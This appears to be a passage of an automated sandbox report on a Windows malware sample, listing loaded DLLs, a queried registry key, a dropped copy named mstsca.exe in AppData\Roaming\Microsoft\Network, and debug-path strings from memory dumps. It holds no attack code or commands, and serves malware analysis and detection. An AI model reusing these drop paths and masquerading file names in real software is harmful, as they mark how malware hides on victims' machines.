Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: sIQywRNC5M.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4071005184.txtAc source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ory\% source: sIQywRNC5M.exe, 00000005.00000003.2498904016.000000000317B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499420917.0000000003182000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2408003930.0000000003148000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407966724.0000000003134000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.00000000036BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2432204625.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407447439.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433719950.00000000033EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433577318.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\q* source: sIQywRNC5M.exe, 00000005.00000003.2407603026.0000000003247000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432511079.0000000003260000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407898880.0000000003260000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\/ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2515773524.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: sIQywRNC5M.exe, 00000005.00000003.2432511079.00000000032A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407539885.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433074036.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408458902.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2434223056.00000000032EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\+J source: sIQywRNC5M.exe, 00000005.00000003.2466724530.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490137312.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466477187.000000000329D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491259032.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491927492.00000000032C7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2433577318.0000000003551000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408003930.0000000003148000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433755576.0000000003150000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407966724.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433288502.000000000314F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443884667.000000000356D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408038974.000000000314F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433171599.0000000003144000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432766191.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2434156614.0000000003155000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000002.2110659562.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.2108532152.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000009.00000000.2109798030.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\es-CO\od.pdb\a\; source: sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2511539947.00000000036E2000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2504227018.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.0000000003584000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2408275863.0000000003213000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2493105669.0000000003635000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493696832.000000000363C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490698928.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2492669100.000000000360D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.0000000003634000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490315317.00000000035B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2432204625.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443290568.00000000033BF000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433719950.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443649043.00000000033EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000002.2228877025.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000B.00000000.2132609845.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000D.00000000.2227791961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000010.00000000.2233339702.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000010.00000002.2309193789.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000011.00000000.2308477250.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000002.2728791100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000000.2650842338.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2727770543.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000000.3241957172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000002.3340913920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.3340031319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000002.3965266280.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.3841712597.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3962943920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.4442019681.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000002.4493003377.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.0000000003761000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2519391634.0000000003762000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2444323250.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444156089.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1S source: sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.00000000036BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2493105669.0000000003635000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493696832.000000000363C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490698928.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2492669100.000000000360D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.0000000003634000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490315317.00000000035B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2334966830.0000000003232000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a source: sIQywRNC5M.exe, 00000005.00000003.2510157688.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: sIQywRNC5M.exe, 00000005.00000003.2408003930.0000000003148000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407966724.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408038974.000000000314F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: sIQywRNC5M.exe, 00000005.00000003.2506148285.000000000355D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432511079.00000000032A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2434064607.00000000032A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433577318.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.0000000003751000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\N source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\ source: sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\K source: sIQywRNC5M.exe, 00000005.00000003.2492286668.00000000035AC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493577171.00000000035AC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493024480.00000000035AC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465857393.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: sIQywRNC5M.exe, 00000005.00000003.2407898880.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\MpD source: sIQywRNC5M.exe, 00000005.00000003.2466517212.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466670720.00000000033D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: a\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\S-PC-20231004-1550.log.bgzqtings\Application Data\Application Data\Application Data\Applicatio source: sIQywRNC5M.exe, 00000005.00000002.2547866769.000000000322A000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490587835.000000000321C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499086680.0000000003229000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2505254692.000000000322A000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491776484.0000000003227000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497793013.0000000003224000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498455667.0000000003224000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\l source: sIQywRNC5M.exe, 00000005.00000003.2499050196.000000000319D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2512561008.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498904016.000000000317B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y\ source: sIQywRNC5M.exe, 00000005.00000003.2527809426.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2542393895.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2533728705.00000000035B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\";k source: sIQywRNC5M.exe, 00000005.00000003.2444743844.000000000316D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444634388.0000000003166000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443480171.0000000003150000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\he\r source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\/ source: sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\, source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
